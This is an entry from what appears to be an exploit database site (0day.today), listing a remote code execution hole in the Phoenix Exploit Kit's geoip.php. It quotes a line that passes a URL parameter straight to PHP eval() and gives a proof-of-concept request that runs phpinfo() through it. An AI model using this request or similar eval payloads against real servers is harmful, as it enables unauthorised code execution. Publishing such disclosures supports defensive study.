[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Phoenix Exploit Kit - Remote Code Execution

Author
CrashBandicot
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-25152
Category
web applications
Date add
30-06-2016
Platform
php
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Tested on: MSWin32
  
# Vuln file : geoip.php
  
492.  isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
  
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
 
# Screen : http://i.imgur.com/E7RBBRk.png
 
__END__

#  0day.today [2024-07-05]  #